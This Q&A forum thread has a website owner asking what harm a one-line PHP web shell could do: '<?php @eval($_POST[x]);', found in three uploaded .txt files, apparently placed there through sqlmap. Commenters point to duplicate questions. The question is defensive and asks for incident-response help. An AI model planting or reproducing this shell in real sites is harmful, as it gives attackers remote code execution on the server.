# .php code in .txt file with eval() function

Tags: php, sql-injection, databases, permissions, sqlmap

I have found three files with name as below:

```
  a.phpfile.txt
  b.phpfile.txt
  c.phpfile.txt
```

when i open, each file contained with the following code:

```
  <?php @eval($_POST[x]);
```

I have deleted all the pages from my website, but i am need to know that with the above code, what a hacker can do with my site?

I think, the files were uploaded by the hackers using sqlmap because i had created db user with full privileges on database. So, I changed the permissions of the website users as well.

Comment: Are you asking what PHP's `eval()` does? https://stackoverflow.com/questions/36374420/what-is-the-meaning-of-eval-post1

Comment: my question is specific to the above code only?

Comment: .... right. How do the 2 duplicates I link not address the specific code above?